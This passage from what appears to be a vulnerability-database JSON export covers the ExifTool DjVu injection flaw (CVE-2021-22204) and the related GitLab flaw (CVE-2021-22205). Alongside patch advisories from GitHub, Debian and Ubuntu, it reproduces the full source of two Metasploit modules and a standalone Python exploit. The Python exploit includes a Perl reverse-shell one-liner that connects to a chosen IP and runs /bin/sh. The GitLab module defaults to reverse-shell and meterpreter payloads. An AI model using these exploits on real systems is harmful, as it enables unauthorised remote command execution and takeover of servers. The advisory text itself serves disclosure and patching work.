unauthenticated file upload and command\n injection vulnerability in GitLab Community Edition (CE) and\n Enterprise Edition (EE). 
The patched versions are 13.10.3, 13.9.6,\n and 13.8.8.\n\n Exploitation will result in command execution as the git user.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'William Bowling', # Vulnerability discovery and CVE-2021-22204 PoC\n 'jbaines-r7' # Metasploit module\n ],\n 'References' => [\n [ 'CVE', '2021-22205' ], # GitLab\n [ 'CVE', '2021-22204' ], # ExifTool\n [ 'URL', 'https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/' ],\n [ 'URL', 'https://hackerone.com/reports/1154542' ],\n [ 'URL', 'https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis' ],\n [ 'URL', 'https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/' ]\n ],\n 'DisclosureDate' => '2021-04-14',\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'Payload' => {\n 'Space' => 290,\n 'DisableNops' => true,\n 'BadChars' => '#'\n },\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_openssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'CmdStagerFlavor' => [ 'wget', 'lwprequest', 'curl', 'printf' ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'MeterpreterTryToFork' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def upload_file(file_data, timeout = 20)\n random_filename = \"#{rand_text_alphanumeric(6..12)}.jpg\"\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part(\n file_data,\n 'image/jpeg',\n 'binary',\n \"form-data; name=\\\"file\\\"; 
filename=\\\"#{random_filename}\\\"\"\n )\n\n random_uri = normalize_uri(target_uri.path, rand_text_alphanumeric(6..12))\n print_status(\"Uploading #{random_filename} to #{random_uri}\")\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => random_uri,\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n }, timeout)\n end\n\n def check\n # Checks if the instance is a GitLab install by looking for the\n # 'About GitLab' footer or a password redirect. If that's successful\n # a bogus jpg image is uploaded to a bogus URI. The patched versions\n # should never send the bad image to ExifTool, resulting in a 404.\n # The unpatched versions should feed the image to the vulnerable\n # ExifTool, resulting in a 422 error message.\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/users/sign_in')\n })\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n # handle two cases. 
First a normal install will respond with HTTP 200.\n # Second, if the root password hasn't been set yet then this will\n # redirect to the password reset page.\n unless (res.code == 200 && res.body.include?('>About GitLab<')) ||\n (res.code == 302 && res.body.include?('/users/password/edit?reset_password_token'))\n return CheckCode::Safe('Not a GitLab web interface')\n end\n\n res = upload_file(rand_text_alphanumeric(6..32))\n unless res\n return CheckCode::Detected('The target did not respond to the upload request.')\n end\n\n case res.code\n when 422\n if res.body.include?('The change you requested was rejected.')\n return CheckCode::Vulnerable('The error response indicates ExifTool was executed.')\n end\n when 404\n if res.body.include?('The page could not be found')\n return CheckCode::Safe('The error response indicates ExifTool was not run.')\n end\n end\n\n return CheckCode::Detected\n end\n\n def execute_command(cmd, _opts = {})\n # printf needs all '\\' to be double escaped due to ExifTool parsing\n if cmd.start_with?('printf ')\n cmd = cmd.gsub('\\\\', '\\\\\\\\\\\\')\n end\n\n # header and trailer are taken from William Bowling's echo_vakzz.jpg from their original h1 disclosure.\n # The 'cmd' variable is sandwiched in a qx## function.\n payload_header = \"AT&TFORM\\x00\\x00\\x03\\xAFDJVMDIRM\\x00\\x00\\x00.\\x81\\x00\\x02\\x00\\x00\\x00F\\x00\\x00\"\\\n \"\\x00\\xAC\\xFF\\xFF\\xDE\\xBF\\x99 !\\xC8\\x91N\\xEB\\f\\a\\x1F\\xD2\\xDA\\x88\\xE8k\\xE6D\\x0F,q\\x02\\xEEI\\xD3n\"\\\n \"\\x95\\xBD\\xA2\\xC3\\\"?FORM\\x00\\x00\\x00^DJVUINFO\\x00\\x00\\x00\\n\\x00\\b\\x00\\b\\x18\\x00d\\x00\\x16\\x00IN\"\\\n \"CL\\x00\\x00\\x00\\x0Fshared_anno.iff\\x00BG44\\x00\\x00\\x00\\x11\\x00J\\x01\\x02\\x00\\b\\x00\\b\\x8A\\xE6\\xE1\"\\\n \"\\xB17\\xD9\\x7F*\\x89\\x00BG44\\x00\\x00\\x00\\x04\\x01\\x0F\\xF9\\x9FBG44\\x00\\x00\\x00\\x02\\x02\\nFORM\\x00\\x00\"\\\n \"\\x03\\aDJVIANTa\\x00\\x00\\x01P(metadata\\n\\t(Copyright \\\"\\\\\\n\\\" . qx#\"\n payload_trailer = \"# . 
\\\\\\x0a\\\" b \\\") )\" + (' ' * 421)\n\n res = upload_file(payload_header + cmd + payload_trailer, 5)\n\n # Successful exploitation can result in no response (connection being held open by a reverse shell)\n # or, if the command executes immediately, a response with a 422.\n if res && res.code != 422\n fail_with(Failure::UnexpectedReply, \"The target replied with HTTP status #{res.code}. No reply was expected.\")\n end\n\n print_good('Exploit successfully executed.')\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n # payload is truncated by exiftool after 290 bytes. Because we need to\n # expand the printf flavor by a potential factor of 2, halve the linemax.\n execute_cmdstager(linemax: 144)\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/gitlab_exif_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "github": [{"lastseen": "2023-01-09T05:06:51", "description": "### Impact\n\nArbitrary code execution can occur when running `exiftool` against files with hostile metadata payloads.\n\n### Patches\n\nExifTool has already been patched in version 12.24. 
exiftool-vendored, which vendors ExifTool, includes this patch in v14.3.0.\n\n### Workarounds\n\nNo.\n\n### References\n\nhttps://twitter.com/wcbowling/status/1385803927321415687\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-22204\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [exiftool-vendored](https://github.com/photostructure/exiftool-vendored.js)\n\n", "cvss3": {}, "published": "2021-05-04T17:43:52", "type": "github", "title": "Arbitrary code execution in ExifTool", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-22204"], "modified": "2023-01-09T05:04:47", "id": "GHSA-4WHQ-R978-2X68", "href": "https://github.com/advisories/GHSA-4whq-r978-2x68", "cvss": {"score": 0.0, "vector": "NONE"}}], "osv": [{"lastseen": "2022-08-10T07:15:54", "description": "\nA vulnerability was discovered in libimage-exiftool-perl, a library and\nprogram to read and write meta information in multimedia files, which\nmay result in execution of arbitrary code if a malformed DjVu file is\nprocessed.\n\n\nFor the stable distribution (buster), this problem has been fixed in\nversion 11.16-1+deb10u1.\n\n\nWe recommend that you upgrade your libimage-exiftool-perl packages.\n\n\nFor the detailed security status of libimage-exiftool-perl please refer\nto its security tracker page at:\n<https://security-tracker.debian.org/tracker/libimage-exiftool-perl>\n\n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-02T00:00:00", "type": "osv", "title": "libimage-exiftool-perl - security update", "bulletinFamily": "software", "cvss2": {"severity": 
"MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-08-10T07:15:48", "id": "OSV:DSA-4910-1", "href": "https://osv.dev/vulnerability/DSA-4910-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T08:15:28", "description": "\nA vulnerability was discovered in libimage-exiftool-perl, a library\nand program to read and write meta information in multimedia files,\nwhich may result in execution of arbitrary code if a malformed DjVu\nfile is processed.\n\n\nFor Debian 9 stretch, this problem has been fixed in version\n10.40-1+deb9u1.\n\n\nWe recommend that you upgrade your libimage-exiftool-perl packages.\n\n\nFor the detailed security status of libimage-exiftool-perl please refer to\nits security tracker page at:\n<https://security-tracker.debian.org/tracker/libimage-exiftool-perl>\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-16T00:00:00", "type": "osv", "title": "libimage-exiftool-perl - 
security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-07-21T05:53:44", "id": "OSV:DLA-2663-1", "href": "https://osv.dev/vulnerability/DLA-2663-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-08T05:46:49", "description": "### Impact\nArbitrary code execution can occur when running `exiftool` against files with hostile metadata payloads\n\n### Patches\nExifTool has already been patched in version 12.24. `exiftool_vendored.rb`, which vendors ExifTool, includes this patch in [v12.25.0](https://github.com/exiftool-rb/exiftool_vendored.rb/releases/tag/v12.25.0).\n\n### Workarounds\nNo\n\n### References\nhttps://twitter.com/wcbowling/status/1385803927321415687\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-22204\n\n### For more information\nIf you have any questions or comments about this advisory:\n\nOpen an issue in [exiftool_vendored.rb](https://github.com/exiftool-rb/exiftool_vendored.rb/issues)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-20T19:33:40", "type": "osv", "title": "ExifTool vulnerable to 
arbitrary code execution", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2023-03-08T05:46:46", "id": "OSV:GHSA-Q95H-CQRV-8JV5", "href": "https://osv.dev/vulnerability/GHSA-q95h-cqrv-8jv5", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-11T21:36:30", "description": "### Impact\n\nArbitrary code execution can occur when running `exiftool` against files with hostile metadata payloads.\n\n### Patches\n\nExifTool has already been patched in version 12.24. 
exiftool-vendored, which vendors ExifTool, includes this patch in v14.3.0.\n\n### Workarounds\n\nNo.\n\n### References\n\nhttps://twitter.com/wcbowling/status/1385803927321415687\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-22204\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [exiftool-vendored](https://github.com/photostructure/exiftool-vendored.js)\n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-04T17:43:52", "type": "osv", "title": "Arbitrary code execution in ExifTool", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-10-08T21:20:43", "id": "OSV:GHSA-4WHQ-R978-2X68", "href": "https://osv.dev/vulnerability/GHSA-4whq-r978-2x68", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2023-03-06T06:07:34", "description": "Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-23T18:15:00", "type": "debiancve", "title": "CVE-2021-22204", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-04-23T18:15:00", "id": "DEBIANCVE:CVE-2021-22204", "href": "https://security-tracker.debian.org/tracker/CVE-2021-22204", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-01-27T13:34:17", "description": "Improper neutralization of user data in the DjVu file format in ExifTool\nversions 7.44 and up allows arbitrary code execution when parsing the\nmalicious image\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=987505>\n * <https://bugs.launchpad.net/bugs/1925985>\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-23T00:00:00", 
"type": "ubuntucve", "title": "CVE-2021-22204", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-04-23T00:00:00", "id": "UB:CVE-2021-22204", "href": "https://ubuntu.com/security/CVE-2021-22204", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-03T01:39:42", "description": "This Metasploit module exploits a Perl injection vulnerability in the DjVu ANT parsing code of ExifTool versions 7.44 through 12.23 inclusive. The injection is used to execute a shell command using Perl backticks. 
The DjVu image can be embedded in a wrapper image using the HasselbladExif EXIF field.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-12T00:00:00", "type": "zdt", "title": "ExifTool DjVu ANT Perl Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-05-12T00:00:00", "id": "1337DAY-ID-36236", "href": "https://0day.today/exploit/description/36236", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'ExifTool DjVu ANT Perl injection',\n 'Description' => %q{\n This module exploits a Perl injection vulnerability in the DjVu ANT\n parsing code of ExifTool versions 7.44 through 12.23 inclusive. 
The\n injection is used to execute a shell command using Perl backticks.\n The DjVu image can be embedded in a wrapper image using the\n HasselbladExif EXIF field.\n },\n 'Author' => [\n 'William Bowling', # Vulnerability discovery\n 'Justin Steven' # Metasploit module\n ],\n 'References' => [\n %w[CVE 2021-22204],\n %w[URL https://twitter.com/wcbowling/status/1385803927321415687],\n %w[URL https://github.com/exiftool/exiftool/commit/cf0f4e7dcd024ca99615bfd1102a841a25dde031],\n %w[URL https://www.openwall.com/lists/oss-security/2021/05/10/5]\n ],\n 'DisclosureDate' => '2021-05-24',\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Privileged' => false,\n 'Payload' => {\n 'DisableNops' => true,\n 'Space' => 2000,\n 'BadChars' => \"\\x22\\x24\\x40\\x60\\x5c\" # \", $, @, ` and \\\n },\n 'Targets' => [\n ['JPEG file', { template: 'msf.jpg' }],\n ['TIFF file', { template: 'msf.tif' }],\n ['DjVu file', { template: 'msf.djvu' }]\n ],\n 'DefaultTarget' => 0\n )\n )\n\n register_options([\n OptString.new('FILENAME', [true, 'Output file', 'msf.jpg'])\n ])\n end\n\n def exploit\n p = payload.encoded\n\n buf = djvu_template.sub('echo vulnerable > /dev/tty', p)\n buf[8, 4] = [209 + p.length].pack('L>') # Fix up DJVM length\n buf[174, 4] = [43 + p.length].pack('L>') # Fix up DJVI length\n buf[186, 4] = [31 + p.length].pack('L>') # Fix up ANTa length\n\n if target.name == 'JPEG file'\n jpeg_buf = jpeg_template\n jpeg_buf[86, 2221] = buf + Rex::Text.rand_text_alphanumeric(2221 - buf.length)\n buf = jpeg_buf\n elsif target.name == 'TIFF file'\n tif_buf = tif_template\n tif_buf[206, 2221] = buf + Rex::Text.rand_text_alphanumeric(2221 - buf.length)\n buf = tif_buf\n end\n\n file_create(buf)\n end\n\n def djvu_template\n File.read(File.join(\n Msf::Config.data_directory, 'exploits', 'CVE-2021-22204', 'msf.djvu'\n ))\n end\n\n def jpeg_template\n File.read(File.join(\n Msf::Config.data_directory, 'exploits', 'CVE-2021-22204', 'msf.jpg'\n ))\n end\n\n def 
tif_template\n File.read(File.join(\n Msf::Config.data_directory, 'exploits', 'CVE-2021-22204', 'msf.tif'\n ))\n end\nend\n", "sourceHref": "https://0day.today/exploit/36236", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-12T09:35:29", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-12T00:00:00", "type": "zdt", "title": "ExifTool 12.23 - Arbitrary Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-05-12T00:00:00", "id": "1337DAY-ID-37713", "href": "https://0day.today/exploit/description/37713", "sourceData": "# Exploit Title: ExifTool 12.23 - Arbitrary Code Execution\n# Exploit Author: UNICORD (NicPWNs & Dev-Yeoj)\n# Vendor Homepage: https://exiftool.org/\n# Software Link: https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip\n# Version: 7.44-12.23\n# Tested on: ExifTool 12.23 (Debian)\n# CVE: CVE-2021-22204\n# Source: https://github.com/UNICORDev/exploit-CVE-2021-22204\n# Description: Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 
and up allows arbitrary code execution when parsing the malicious image\n\n#!/usr/bin/env python3\n\n# Imports\nimport base64\nimport os\nimport subprocess\nimport sys\n\n# Class for colors\nclass color:\n red = '\\033[91m'\n gold = '\\033[93m'\n blue = '\\033[36m'\n green = '\\033[92m'\n no = '\\033[0m'\n\n# Print UNICORD ASCII Art\ndef UNICORD_ASCII():\n print(rf\"\"\"\n{color.red} _ __,~~~{color.gold}/{color.red}_{color.no} {color.blue}__ ___ _______________ ___ ___{color.no}\n{color.red} ,~~`( )_( )-\\| {color.blue}/ / / / |/ / _/ ___/ __ \\/ _ \\/ _ \\{color.no}\n{color.red} |/| `--. {color.blue}/ /_/ / // // /__/ /_/ / , _/ // /{color.no}\n{color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\\____/_/|_/___/\\___/\\____/_/|_/____/{color.green}....{color.no}\n \"\"\")\n\n# Print exploit help menu\ndef help():\n print(r\"\"\"UNICORD Exploit for CVE-2021-22204\n\nUsage:\n python3 exploit-CVE-2021-22204.py -c <command>\n python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port>\n python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>]\n python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>]\n python3 exploit-CVE-2021-22204.py -h\n\nOptions:\n -c Custom command mode. Provide command to execute.\n -s Reverse shell mode. Provide local IP and port.\n -i Path to custom JPEG image. 
(Optional)\n -h Show this help menu.\n\"\"\")\n\n# Run the exploit\ndef exploit(command):\n\n UNICORD_ASCII()\n\n # Create perl payload\n payload = \"(metadata \\\"\\c${\"\n payload += command\n payload += \"};\\\")\"\n\n print(f\"{color.red}RUNNING: {color.blue}UNICORD Exploit for CVE-2021-22204{color.no}\")\n print(f\"{color.red}PAYLOAD: {color.gold}\" + payload + f\"{color.no}\")\n\n # Write payload to file\n payloadFile = open('payload','w')\n payloadFile.write(payload)\n payloadFile.close()\n\n # Bzz compress file\n subprocess.run(['bzz', 'payload', 'payload.bzz'])\n\n # Run djvumake\n subprocess.run(['djvumake', 'exploit.djvu', \"INFO=1,1\", 'BGjp=/dev/null', 'ANTz=payload.bzz'])\n\n if '-i' in sys.argv:\n imagePath = sys.argv[sys.argv.index('-i') + 1]\n subprocess.run(['cp',f'{imagePath}','./image.jpg','-n'])\n\n else:\n # Smallest possible JPEG\n image = b\"/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/yQALCAABAAEBAREA/8wABgAQEAX/2gAIAQEAAD8A0s8g/9k=\"\n\n # Write smallest possible JPEG image to file\n with open(\"image.jpg\", \"wb\") as img:\n img.write(base64.decodebytes(image))\n\n # Write exiftool config to file\n config = (r\"\"\"\n %Image::ExifTool::UserDefined = (\n 'Image::ExifTool::Exif::Main' => {\n 0xc51b => {\n Name => 'HasselbladExif',\n Writable => 'string',\n WriteGroup => 'IFD0',\n },\n },\n );\n 1; #end\n \"\"\")\n configFile = open('exiftool.config','w')\n configFile.write(config)\n configFile.close()\n\n # Exiftool config for output image\n subprocess.run(['exiftool','-config','exiftool.config','-HasselbladExif<=exploit.djvu','image.jpg','-overwrite_original_in_place','-q'])\n\n # Delete leftover files\n os.remove(\"payload\")\n os.remove(\"payload.bzz\")\n os.remove(\"exploit.djvu\")\n os.remove(\"exiftool.config\")\n\n # Print results\n print(f\"{color.red}RUNTIME: {color.green}DONE - Exploit image written to 'image.jpg'{color.no}\\n\")\n\n exit()\n\nif __name__ 
== \"__main__\":\n\n args = ['-h','-c','-s','-i']\n\n if args[0] in sys.argv:\n help()\n\n elif args[1] in sys.argv and not args[2] in sys.argv:\n exec = sys.argv[sys.argv.index(args[1]) + 1]\n command = f\"system(\\'{exec}\\')\"\n exploit(command)\n\n elif args[2] in sys.argv and not args[1] in sys.argv:\n localIP = sys.argv[sys.argv.index(args[2]) + 1]\n localPort = sys.argv[sys.argv.index(args[2]) + 2]\n command = f\"use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in({localPort},inet_aton('{localIP}')))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');}};\"\n exploit(command)\n\n else:\n help()\n", "sourceHref": "https://0day.today/exploit/37713", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-09-07T08:59:14", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": 